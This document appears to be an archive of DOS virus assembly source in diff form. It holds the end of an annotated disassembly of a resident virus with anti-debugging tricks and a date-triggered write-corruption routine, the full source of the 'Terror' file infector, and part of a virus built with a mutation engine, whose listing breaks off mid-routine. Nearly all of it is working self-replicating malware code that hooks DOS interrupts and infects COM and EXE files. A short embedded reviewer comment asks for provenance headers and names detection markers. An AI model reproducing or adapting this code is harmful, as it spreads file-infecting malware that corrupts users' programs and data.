int 21h ;1679 CD 21
mov cx,ax ;bytes written ;167B 8B C8
call s_13B0 ;Move file ptr to EOF ;167D E8 FD30
call s_15C7 ;write aligning bytes ;1680 E8 FF44
mov ax,8 ;switch off virus ;1683 B8 0008
mov es,ax ;1686 8E C0
mov cx,28h ;40 bytes ;1688 B9 0028
mov dx,322h ;offset l_16A2 ;168B .BA 0322
mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B
mov ah,40h ;write file ;1693 B4 40
int 21h ;1695 CD 21
mov cx,ax ;bytes written ;1697 8B C8
call s_13E8 ;Calculate virus length ;1699 E8 FD4C
call s_15FE ;Write const part of vir;169C E8 FF5F
l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06
s_13FD endp
;<-- COM type virus begin pattern
d_0322: push ds ;16A2 1E
push cs ;16A3 0E
pop ds ;16A4 1F
lea si,cs:[4F7h] ;16A5 8D 36 04F7
mov di,0100h ;16A9.BF 0100
mov cx,20h ;16AC B9 0020
rep movsb ;16AF F3/ A4
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF
nop ;16B7 90
pop ds ;16B8 1F
lea ax,cs:[54Fh] ;16B9 8D 06 054F
jmp ax ;16BD FF E0
;------ work area
d_033F dw 0020h ;oryg. file attr ;16BF 20 00
d_0341 dw 05EAh ;const virus code length;16C1 EA 05
d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00
d_0345 dw 28h ;16C5 28 00
d_0347 dw 200h ;size of header ;16C7 00 02
d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00
;================================================================
; init registers
;----------------------------------------------------------------
s_16CA proc near
xor si,si ;16CA 33 F6
xor di,di ;16CC 33 FF
xor ax,ax ;16CE 33 C0
xor dx,dx ;16D0 33 D2
xor bp,bp ;16D2 33 ED
retn ;16D4 C3
s_16CA endp
;================================================================
; int 24h handling routine (infection time active only)
;----------------------------------------------------------------
l_16D5: cmp di,0 ;16D5 83 FF 00
jne l_16DD ;16D8 75 03
mov al,3 ;ignore ;16DA B0 03
iret ;16DC CF
l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362
d_0362 dw 0556h,0DF0h ;16E2 56 05 F0 0D
;================================================================
; Get int 24h
;----------------------------------------------------------------
s_16E6 proc near
cli ; Disable interrupts ;16E6 FA
xor bx,bx ;16E7 33 DB
mov es,bx ;16E9 8E C3
mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090
mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362
mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092
mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364
mov word ptr es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355
mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092
sti ;170A FB
retn ;170B C3
s_16E6 endp
;================================================================
; Restore int 24h vector
;----------------------------------------------------------------
s_170C proc near
cli ;170C FA
xor bx,bx ;170D 33 DB
mov es,bx ;170F 8E C3
mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362
mov es:[90h],bx ;1716 26: 89 1E 0090
mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364
mov es:[92h],bx ;1720 26: 89 1E 0092
sti ;1725 FB
retn ;1726 C3
s_170C endp
;===============================================================
; write handle service routine (destruction routine)
;---------------------------------------------------------------
s_1727 proc near
push ax ;1727 50
push bx ;1728 53
push cx ;1729 51
push dx ;172A 52
push es ;172B 06
push ds ;172C 1E
push si ;172D 56
push di ;172E 57
mov ax,es ;172F 8C C0
cmp ax,8 ;1731 3D 0008
je l_1750 ;-> virus contamination ;1734 74 1A
cmp bx,4 ;1736 83 FB 04
jb l_1750 ;-> BIOS ;1739 72 15
mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A
int 21h ;173D CD 21
cmp dh,9 ;september ? ;173F 80 FE 09
jb l_1750 ;-> bellow ;1742 72 0C
pop di ;1744 5F
pop si ;1745 5E
pop ds ;1746 1F
pop es ;1747 07
pop dx ;1748 5A
pop cx ;1749 59
pop bx ;174A 5B
pop ax ;174B 58
add dx,0Ah ;shift buffer address ;174C 83 C2 0A
retn ;174F C3
l_1750: pop di ;1750 5F
pop si ;1751 5E
pop ds ;1752 1F
pop es ;1753 07
pop dx ;1754 5A
pop cx ;1755 59
pop bx ;1756 5B
pop ax ;1757 58
retn ;1758 C3
s_1727 endp
db 16 dup (0) ;not used ;1759 0010[00]
;================================================================
; Load & Execute service routine
;----------------------------------------------------------------
s_1769 proc near
push ax ;1769 50
push bx ;176A 53
push cx ;176B 51
push dx ;176C 52
push es ;176D 06
push ds ;176E 1E
push si ;176F 56
push di ;1770 57
mov si,dx ;file pathname ;1771 8B F2
mov ax,cs ;1773 8C C8
mov es,ax ;1775 8E C0
mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F
mov cx,19h ;177A B9 0019
rep movsb ;copy victim name ;177D F3/ A4
call s_16E6 ;Get int 24h vector ;177F E8 FF64
mov ds,ax ;ds:=cs ;1782 8E D8
call s_13FD ;1784 E8 FC76
call s_170C ;Restore int 24h vector ;1787 E8 FF82
pop di ;178A 5F
pop si ;178B 5E
pop ds ;178C 1F
pop es ;178D 07
pop dx ;178E 5A
pop cx ;178F 59
pop bx ;1790 5B
pop ax ;1791 58
retn ;1792 C3
s_1769 endp
;================================================================
; New int 21h service routine
;----------------------------------------------------------------
;<---- 10 bytes to identify resident virus
d_0413: pushf ;1793 9C
cmp ah,40h ;write handle ? ;1794 80 FC 40
jne l_179F ;-> no ;1797 75 06
call s_1727 ;write handle service routine ;1799 E8 FF8B
jmp short l_17A7 ;179C EB 09
nop ;179E 90
l_179F: cmp ah,4Bh ;Load & Execute ? ;179F 80 FC 4B
jne l_17A7 ;-> no ;17A2 75 03
call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2
l_17A7: popf ;17A7 9D
;================================================================
; Execute substituted code and jump into old int 21h service
;----------------------------------------------------------------
;<- four bytes from int 21h service
d_0428: cmp ah,51h ;17A8 80 FC 51
d_042B: je l_17B2 ;17AB 74 05
jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547
l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D
d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02
;================================================================
; Make virus resident
;----------------------------------------------------------------
s_17BB proc near
cli ;disable interrupts ;17BB FA
push es ;17BC 06
lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413
mov di,si ;17C1 8B FE
mov cx,9800h ;resident virus segment ;17C3 B9 9800
mov es,cx ;17C6 8E C1
mov cx,0Ah ;17C8 B9 000A
repe cmpsb ;17CB F3/ A6
cmp cx,0 ;17CD 83 F9 00
pop es ;17D0 07
jz l_181A ;-> allready resident ;17D1 74 47
mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084
mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086
mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549
mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F
mov di,bx ;17E2 8B FB
mov es,ax ;17E4 8E C0
mov cx,80h ;17E6 B9 0080
mov al,80h ;17E9 B0 80
l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE
cmp cx,0 ;17ED 83 F9 00
je l_1870 ;-> not found, EXIT ;17F0 74 7E
cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC
jne l_17EB ;-> find another place ;17F6 75 F3
;<- get four bytes from int 21h service
mov al,es:[di+2] ;17F8 26: 8A 45 02
mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B
mov al,es:[di-1] ;1800 26: 8A 45 FF
mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428
mov al,es:[di] ;1808 26: 8A 05
mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429
mov al,es:[di+1] ;180F 26: 8A 45 01
mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A
jmp short l_1821 ;1817 EB 08
nop ;1819 90
;<- allready resident
l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54
nop ;181C 90
d_049D dw 140Dh ;address to jump1 into ;181D 0D 14
d_049F dw 0278h ;old int 21h segment ;181F 78 02
l_1821: mov ax,di ;1821 8B C7
add ax,4 ;next to conditional jmp;1823 05 0004
xor bx,bx ;1826 33 DB
mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03
add ax,bx ;jump address ;182C 03 C3
mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D
cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80
jb l_183E ;-> forward jump ;1836 72 06
;<- jump backwards
sub ax,100h ;minus carry ;1838 2D 0100
mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D
l_183E: add di,4 ;second condition addrs ;183E 83 C7 04
mov word ptr ds:[547h],di ;1841 89 3E 0547
sub di,5 ;<- area to substitute ;1845 83 EF 05
push es ;1848 06
push di ;1849 57
mov dx,9800h ;resident virus segment ;184A BA 9800
mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5
mov es,dx ;1852 8E C2
xor si,si ;1854 33 F6
xor di,di ;1856 33 FF
mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612
rep movsb ;copy virus code ;185B F3/ A4
;<----- take control over int 21h
lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413
mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3
pop di ;1865 5F
pop es ;1866 07
mov cx,5 ;1867 B9 0005
lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2
rep movsb ;186E F3/ A4
l_1870: sti ;1870 FB
retn ;1871 C3
s_17BB endp
;<---- instruction pattern to write over int 21h code
d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA
d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00
d_04F5 dw 9800h ;resident virus segment ;1875 00 98
;================================================
; saved 32 victim bytes
;------------------------------------------------
d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11
db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72
;1880 74 65 64 00 00 00 00
db 'MZ' ;1887 4D 5A
db 0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00
db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF
db 98h,00h ;1895 98 00 00
;-----------------------------------
db 48 dup (0) ;not used ;1897 0030[00]
d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14
d_0549 dw 0278h ;old int 21h segment ;18C9 78 02
;<------ code writed to in case of paragraf alignement
db 0E9h ;jmp l_18CF ;18CB E9
d_054C dw 052Ch ;distance of jump ;18CC 2C 05
db 0 ;18CE 00
;================================================================
; EXE virus entry
;----------------------------------------------------------------
l_18CF: push bx ;18CF 53
push cx ;18D0 51
push es ;18D1 06
push ds ;18D2 1E
pushf ;18D3 9C
mov ax,cs ;18D4 8C C8
mov ds,ax ;18D6 8E D8
call s_1938 ;make virus resident ;18D8 E8 005D
cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF
je l_18E5 ;18E0 74 03
jmp short l_1953 ;-> ? ;18E2 EB 6F
nop ;18E4 90
;================================================================
; End of virus code - file *.COM
;----------------------------------------------------------------
l_18E5: popf ;18E5 9D
pop ds ;18E6 1F
pop es ;18E7 07
pop cx ;18E8 59
pop bx ;18E9 5B
mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100
mov ax,es ;18F1 8C C0
mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6
call s_16CA ;init registers ;18F7 E8 FDD0
jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4
;<--- victim name
d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53
;1905 2E 43 4F 4D
db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00
db 9 dup (0) ;190F 0009[00]
;================================================================
; ANTYDEBUG - make virus resident
;----------------------------------------------------------------
s_1918 proc near
cmp ax,3000h ;1918 3D 3000
jne l_1925 ;-> int 3 ;191B 75 08
call s_17BB ;-> make virus resident ;191D E8 FE9B
retn ;1920 C3
s_1918 endp
d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00
d_05A3 dw 1388h ;victim SP ;1923 88 13
;================================================================
; ANTYDEBUG - call int 3 (Breakpoint)
;----------------------------------------------------------------
s_1925 proc near
l_1925: mov ax,3000h ;Flag register ;1925 B8 3000
push ax ;1928 50
l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C
cmp ax,3000h ;192E 3D 3000
jne l_1929 ;1931 75 F6
retn ;1933 C3
s_1925 endp
d_05B4 dw 0000h ;victim IP ;1934 00 00
d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00
;================================================================
; Make virus resident
;----------------------------------------------------------------
s_1938 proc near
push es ;1938 06
call s_1948 ;-> INT 1 (single step) ;1939 E8 000C
cmp ax,0 ;193C 3D 0000
jne l_1947 ;193F 75 06
call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1
call s_1918 ;-> reside virus ;1944 E8 FFD1
l_1947: pop es ;1947 07
;================================================================
; ANTYDEBUG - call int 1 = Single Step
;----------------------------------------------------------------
s_1948: pushf ;1948 9C
xor ax,ax ;1949 33 C0
mov es,ax ;194B 8E C0
call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004
retn ;1952 C3
s_1938 endp
;================================================================
; End of virus code - file *.EXE
;----------------------------------------------------------------
l_1953: popf ;1953 9D
pop ds ;1954 1F
pop es ;1955 07
pop cx ;1956 59
pop bx ;1957 5B
mov ax,es ;1958 8C C0
add ax,10h ;relocating value ;195A 05 0010
mov dx,ax ;195D 8B D0
mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1
add bp,ax ;1964 03 E8
mov ss,bp ;1966 8E D5
mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3
mov sp,bp ;196D 8B E5
mov ax,dx ;196F 8B C2
add word ptr cs:[5B6h],ax ;l_1936 - CS relocation ;1971 2E: 01 06 05B6
call s_16CA ;init registers ;1976 E8 FD51
jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4
db 20 dup (0) ;COM file stack ;197E 0014[00]
d_0612 label byte ;1992h
seg_a ends
end start



@ -0,0 +1,492 @@
;**********************************************
; Terror Virus
;**********************************************
Code Segment
Assume CS:Code
Org 100h
Start: jmp short Begin
Table310 dw 12E4h,09ABh
Table320 dw 138Dh,17D0h
Table330 dw 1460h,0F7Ah
FileBytes dw 12 dup (9090h)
ComSpec db 'A:\COMMAND.COM',0
CheckEXE: cmp cs:FileBytes,4D5Ah
je IsEXE
cmp cs:FileBytes,5A4Dh
IsEXE: ret
Begin: mov word ptr cs:PSPSeg,ds
push ax
mov ax,0EC59h
int 21h
cmp bp,ax
jnz Install
push cs
pop ds
StartFile: pop ax
mov es,word ptr cs:PSPSeg
call CheckEXE
je ExeFileStart
mov cx,13
mov si,offset FileBytes
push es
mov di,100h
push di
rep movsb
push es
pop ds
retf
ExeFileStart: mov si,es
add si,10h
add cs:FileBytes [16h],si
add si,cs:FileBytes [0Eh]
mov di,cs:FileBytes [10h]
push es
pop ds
cli
mov ss,si
mov sp,di
sti
jmp dword ptr cs:FileBytes [14h]
Install: mov ah,30h
int 21h
mov bx,offset Table310
cmp ax,0A03h
jne Not310
mov ax,0070h
mov bx,0D43h
mov es,ax
cmp byte ptr es:[bx],2Eh ; CS prefix
jne SetVectors
mov ax,bx
jmp short SetV1
Not310: add bx,4
cmp ax,1403h
je SetVectors
add bx,4
cmp ax,1E03h
je SetVectors
mov ax,3513h
int 21h
mov word ptr cs:True13, bx
mov word ptr cs:True13 + 2,es
mov ax,3521h
mov dx,bx
jmp short Set21
SetVectors: mov ax,word ptr cs:[bx+2]
SetV1: mov dx,word ptr cs:[bx]
mov word ptr cs:True13,ax
mov word ptr cs:True13 + 2,0070h
mov ah,34h
int 21h
Set21: push es
pop ds
mov ax,25ECh
int 21h
mov ax,word ptr cs:PSPSeg
mov es,ax
dec ax
mov ds,ax
mov bx,word ptr ds:[3]
sub bx,101
add ax,bx
mov word ptr es:[0002h],ax ; Setup PSP memory size.
; Command.COM needs that
; action; else the system
; hangs.
mov ah,4Ah
int 0ECh
mov bx,100
mov ah,48h
int 0ECh
sub ax,10h
mov es,ax
mov byte ptr ds:[0000h],5Ah ; This is the last block,
; don't you think so?
push cs
pop ds
mov si,100h
mov di,si
mov cx,MovedSize
rep movsb
mov di,offset Continue
push es
push di
retf
Continue: mov word ptr es:[0F1h],0070h
mov ax,3521h
int 0ECh
mov word ptr cs:Saved21, bx
mov word ptr cs:Saved21 + 2,es
mov ah,25h
mov dx,offset Int21
push cs
pop ds
int 0ECh
push cs
pop es
mov di,offset Handles
mov cx,25
mov al,0
rep stosb
jmp StartFile
Respond: mov bp,ax
iret
Int21: cmp ax,0EC59h
je Respond
cmp ax,4B00h
je Exec
cmp ah,3Dh
je Open
cmp ah,3Eh
je Close
cmp ah,11h
jne End21
push di
mov di,dx
cmp byte ptr ds:[di+6],08 ; Volume ID attributes
je Find1st
EndF1st: pop di
End21: db 0EAh
Saved21 dd ?
Exec: call InfectName
jmp End21
OpenEnd: pop cx
jmp End21
Open: push cx
call GetAttr
jc OpenEnd
cmp cx,20h
pop cx
jne End21
mov al,2
pushf
call dword ptr cs:Saved21
jc Err21
push ax
push bx
mov bx,ax
mov al,byte ptr cs:Command?
mov byte ptr cs:Handles [bx],al
pop bx
pop ax
Err21: retf 2
Close: cmp byte ptr cs:Handles [bx],0
jz End21
push ax
mov al,byte ptr cs:Handles [bx]
mov byte ptr cs:Command?,al
mov byte ptr cs:Handles [bx],0
mov ah,45h
int 0ECh
mov word ptr cs:TempHandle,ax
pop ax
jc End21
pushf
call dword ptr cs:Saved21
jc Err21
push bx
mov bx,word ptr cs:TempHandle
push ds
call SetV
call InfectHandle
call Restore
pop ds
pop bx
clc
retf 2
Find1st: push ax
push dx
push ds
mov al,byte ptr ds:[di+7]
mov dx,offset Comspec
or al,al
jz CurrentDrive
add al,'A'-1
mov byte ptr cs:Comspec,al
jmp short Infect1st
CurrentDrive: add dx,2
Infect1st: push cs
pop ds
call InfectName
pop ds
pop dx
pop ax
jmp EndF1st
InfectName: push ax
push bx
push cx
call GetAttr
jc EndIN0
push cx
push ds
call SetV
pop ds
mov ax,4301h
xor cx,cx
int 0ECh
jc EndIN1
mov ax,3D02h
int 0ECh
mov bx,ax
EndIN1: pop cx
jc EndInfName
call InfectHandle
mov ax,4301h
int 0ECh
EndInfName: call Restore
EndIN0: pop cx
pop bx
pop ax
ret
SetV: push ax
push dx
push bx
push es
mov ax,3513h
int 0ECh
mov word ptr cs:Old13,bx
mov word ptr cs:Old13+2,es
mov al,24h
int 0ECh
mov word ptr cs:Old24,bx
mov word ptr cs:Old24+2,es
pop es
pop bx
push cs
pop ds
mov dx,offset Critical
mov ah,25h
int 0ECh
mov dx,offset Int13
mov al,13h
int 0ECh
pop dx
pop ax
ret
InfectHandle: push ax
push cx
push dx
push si
push di
push ds
mov di,offset FileBytes
mov cx,0FFFFh
mov dx,-6
mov ax,4202h
int 0ECh
mov ah,3Fh
mov cx,6
push cs
pop ds
mov dx,di
int 0ECh
jc EndH1
cmp word ptr cs:[di],'eT'
je EndH1
xor cx,cx
xor dx,dx
mov ax,4200h
int 0ECh
mov ah,3Fh
mov cx,24
mov dx,di
int 0ECh
jnc ReadOk
EndH1: jmp EndInfHandle
ReadOk: xor cx,cx
xor dx,dx
cmp byte ptr cs:Command?,2
jne Seek
cmp word ptr ds:[di+1],4000h ; Is there some
; another virus
; in the stack?
ja EndH1
dec cx
mov dx,-(VirusSize+64)
Seek: mov ax,4202h
Seek1: int 0ECh
test ax,000Fh
jz SeekOk
mov cx,dx
mov dx,ax
add dx,10h
and dl,0F0h
mov ax,4200h
jmp Seek1
SeekOk: call CheckEXE
je SkipEXE
or dx,dx
jnz EndH1
cmp ax,1024
jnb MayBeGood?
jmp EndInfHandle
MayBeGood?: cmp ax,64000
ja EndInfHandle
SkipEXE: mov cl,4
shr ax,cl
mov si,ax
mov cl,12
shl dx,cl
add si,dx
mov ah,40h
mov dx,100h
mov cx,VirusSize
int 0ECh
jc EndInfHandle
call CheckEXE
jne ComFile
sub si,10h
sub si,word ptr cs:[di+08h]
mov word ptr cs:[di+14h],100h
mov word ptr cs:[di+16h],si
mov word ptr cs:[di+10h],400h
add si,VirusSize / 16 + 1
mov word ptr cs:[di+0Eh],si
mov ax,4202h
xor cx,cx
xor dx,dx
int 0ECh
mov cx,200h
div cx
or dx,dx
jz DontAdjust
inc ax
DontAdjust: mov word ptr cs:[di+02h],dx
mov word ptr cs:[di+04h],ax
jmp short Common
ComFile: push si
push di
push es
push cs
pop es
mov si,offset ComHeader
mov cx,11
rep movsb
pop es
pop di
pop ds:[di+11]
Common: mov ax,4200h
xor cx,cx
xor dx,dx
int 0ECh
mov ah,40h
mov cx,24
mov dx,di
int 0ECh
EndInfHandle: mov ax,5700h
int 0ECh
mov al,1
int 0ECh
mov ah,3Eh
int 0ECh
pop ds
pop di
pop si
pop dx
pop cx
pop ax
ret
Restore: push ax
push dx
push ds
mov ax,2513h
mov dx,word ptr cs:Old13
mov ds,word ptr cs:Old13+2
int 0ECh
mov al,24h
mov dx,word ptr cs:Old24
mov ds,word ptr cs:Old24+2
pop ds
pop dx
pop ax
ret
GetAttr: push ax
push es
push di
push bx
mov di,dx
push ds
pop es
mov al,0
mov cx,64
repne scasb
mov ax,word ptr ds:[di-3]
mov cx,word ptr ds:[di-5]
and ax,5F5Fh ; Upcase extension
and ch,5Fh
cmp ax,'MO'
jne Exe?
cmp cx,'C.'
je CommandChk
ErrAttr: stc
jmp short EndAttr
Exe?: cmp ax,'EX'
jne ErrAttr
cmp cx,'E.'
jne ErrAttr
CommandChk: mov cx,7
mov bx,-1
Loop0: inc bx
mov al,byte ptr ds:[bx+di-12]
and al,5Fh
cmp al,byte ptr cs:Comspec [bx+3]
loope Loop0
mov al,1
jne NoCommand
mov al,2
NoCommand: mov byte ptr cs:Command?,al
mov ax,4300h
int 0ECh
EndAttr: pop bx
pop di
pop es
pop ax
ret
Critical: mov al,3
iret
Int13: cmp ah,3
jz Skip13
db 0EAh ; JMP Far
Old13 dd ?
Skip13: db 0EAh
True13 dd ?
ComHeader db 50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h
Terror db ' Terror'
VirusEnd label byte
VirusSize = offset VirusEnd - offset Start
Old24 dd ?
TempHandle label word
PSPSeg dw ?
MovedSize = $ - offset Start
Handles db 25 dup (?)
Command? db ?
Code EndS
End Start
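Review bot: The Terror listing carries no provenance header — nothing under the `; Terror Virus` banner says where the source was obtained, when it was added to the archive, or which binary it corresponds to, and that is exactly what a reader of a historical malware corpus needs before relying on the text. A short comment block there would close the gap, e.g. `; Source: <ARCHIVE-OR-COLLECTION>`, `; Added: <DATE>`, `; Sample hash: <SHA256-OF-ORIGINAL-BINARY>`, with placeholders where the value is unknown. For analysts it would also help if the same header named the static markers the code itself exposes — the `Terror db ' Terror'` string near the end and the AX=0EC59h residency handshake answered by `Respond: mov bp,ax` — since those are what a detection signature for this family keys on. The two Biological-Warfare-generated listings that follow (test1.asm, test2.asm) share the same missing-header problem, and test1's `include bwme.asm` additionally means that listing is not self-contained as uploaded, which its header should state.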

@ -0,0 +1,379 @@
; test1.asm : Test virus #1
; Created with Biological Warfare - Version 0.90á by MnemoniX
PING equ 0F43Fh
PONG equ 0B1DEh
STAMP equ 26
MARKER equ 07070h
code segment
org 0
assume cs:code,ds:code
start:
db 0E9h,3,0 ; to virus
host:
db 0CDh,20h,0 ; host program
virus_begin:
push ds es
call $ + 3 ; BP is instruction ptr.
pop bp
sub bp,offset $ - 1
xor ax,ax ; mild anti-trace code
mov es,ax ; kill interrupts 1 & 3
mov di,6
stosw
mov di,14
stosw
in al,21h ; lock out & reopen keyboard
xor al,2
out 21h,al
xor al,2
out 21h,al
mov ax,PING ; test for residency
int 21h
cmp bx,PONG
je installed
mov ax,es ; Get PSP
dec ax
mov ds,ax ; Get MCB
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
mov es,word ptr ds:[12h]
push cs ; copy virus into memory
pop ds
xor di,di
mov si,bp
mov cx,(virus_end - start) / 2 + 1
rep movsw
xor ax,ax ; capture interrupts
mov ds,ax
mov si,21h * 4 ; get original int 21
mov di,offset old_int_21
movsw
movsw
mov word ptr ds:[si - 4],offset new_int_21
mov ds:[si - 2],es ; and set new int 21
installed:
pop es ds ; restore segregs
cmp sp,MARKER ; check for .EXE
je exe_exit
com_exit:
mov si,[bp + mutator] ; restore host program
sub si,3
mov di,100h
push di
movsw
movsb
call fix_regs ; fix up registers
ret ; and leave
exe_exit:
mov ax,ds ; fix up return address
add ax,10h
push ax
add ax,cs:[bp + exe_cs]
mov cs:[bp + return_cs],ax
mov ax,cs:[bp + exe_ip]
mov cs:[bp + return_ip],ax
pop ax
add ax,cs:[bp + exe_ss] ; restore stack
cli
mov ss,ax
mov sp,cs:[bp + exe_sp]
call fix_regs ; fix up registers
sti
db 0EAh ; back to host program
return_ip dw 0
return_cs dw 0
exe_cs dw -16 ; orig CS:IP
exe_ip dw 103h
exe_sp dw -2 ; orig SS:SP
exe_ss dw -16
fix_regs:
xor ax,ax
cwd
xor bx,bx
mov si,100h
xor di,di
xor bp,bp
ret
; interrupt 21 handler
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
new_int_21:
cmp ax,PING ; residency test
je ping_pong
cmp ah,3Dh ; file open
je file_open
cmp ax,4B00h ; execute program
je execute
int_21_exit:
db 0EAh ; never mind ...
old_int_21 dd 0
ping_pong:
mov bx,PONG
iret
file_open:
push ax cx di es
call get_extension
cmp [di],'OC' ; .COM file?
jne perhaps_exe ; perhaps .EXE then
cmp byte ptr [di + 2],'M'
jne not_prog
jmp a_program
perhaps_exe:
cmp [di],'XE' ; .EXE file?
jne not_prog
cmp byte ptr [di + 2],'E'
jne not_prog
a_program:
pop es di cx ax
jmp execute ; infect file
not_prog:
pop es di cx ax
jmp int_21_exit
execute:
push ax bx cx dx si di ds es
xor ax,ax ; critical error handler
mov es,ax ; routine - catch int 24
mov es:[24h * 4],offset int_24
mov es:[24h * 4 + 2],cs
mov ax,4300h ; change attributes
int 21h
push cx dx ds
xor cx,cx
call set_attributes
mov ax,3D02h ; open file
call int_21
jnc open_it
jmp cant_open
open_it:
xchg bx,ax
push cs ; CS = DS
pop ds
mov ax,5700h ; save file date/time
int 21h
push cx dx
and cl,31 ; check time stamp
cmp cl,STAMP
jnz its_ok
jmp dont_infect
its_ok:
mov ah,3Fh
mov cx,28
mov dx,offset read_buffer
int 21h
cmp word ptr read_buffer,'ZM' ; .EXE?
jne its_ok_2
jmp infect_exe
its_ok_2:
mov al,2 ; move to end of file
call move_file_ptr
cmp dx,65279 - (VIRUS_SIZE + 3)
ja dont_infect ; too big, don't infect
mov word ptr new_jump + 1,dx
add dx,103h
mov mutator,dx
push cs ; call Biological Warfare
pop es ; Mutation Engine
mov cx,VIRUS_SIZE
mov di,offset encrypt_buffer
mov si,offset virus_begin
call _bwme
push cx
mov cx,3
mov ah,40h
mov dx,offset read_buffer ; save original program head
int 21h
mov ah,40h ; write virus to file
pop cx
mov dx,offset encrypt_buffer
int 21h
xor al,al ; back to beginning of file
call move_file_ptr
mov dx,offset new_jump ; and write new jump
int 21h
fix_date_time:
pop dx cx
and cl,-32 ; add time stamp
or cl,STAMP
mov ax,5701h ; restore file date/time
int 21h
close:
pop ds dx cx ; restore attributes
call set_attributes
mov ah,3Eh ; close file
int 21h
cant_open:
pop es ds di si dx cx bx ax
jmp int_21_exit ; leave
set_attributes:
mov ax,4301h
int 21h
ret
dont_infect:
pop cx dx ; can't infect, skip
jmp close
move_file_ptr:
mov ah,42h ; move file pointer
cwd
xor cx,cx
int 21h
mov dx,ax ; set up registers
mov ah,40h
mov cx,3
ret
infect_exe:
cmp word ptr read_buffer[26],0
jne dont_infect ; overlay, don't infect
cmp word ptr read_buffer[16],MARKER
je dont_infect ; infected already
les ax,dword ptr read_buffer[20]
mov exe_cs,es ; CS
mov exe_ip,ax ; IP
les ax,dword ptr read_buffer[14]
mov exe_ss,ax ; SS
mov exe_sp,es ; SP
mov word ptr read_buffer[16],MARKER
mov ax,4202h ; to end of file
cwd
xor cx,cx
int 21h
push ax dx ; save file size
push bx
mov cl,12 ; calculate offsets for CS
shl dx,cl ; and IP
mov bx,ax
mov cl,4
shr bx,cl
add dx,bx
and ax,15
pop bx
sub dx,word ptr read_buffer[8]
mov word ptr read_buffer[22],dx
mov word ptr read_buffer[20],ax
add dx,100
mov word ptr read_buffer[14],dx
pop dx ax ; calculate prog size
add ax,VIRUS_SIZE + 3
adc dx,0
mov cx,512 ; in pages
div cx ; then save results
inc ax
mov word ptr read_buffer[2],dx
mov word ptr read_buffer[4],ax
mov dx,word ptr read_buffer[20]
mov cx,VIRUS_SIZE ; call BWME
mov di,offset encrypt_buffer
mov si,offset virus_begin
push cs
pop es
call _bwme
mov ah,40h
mov dx,offset encrypt_buffer
int 21h
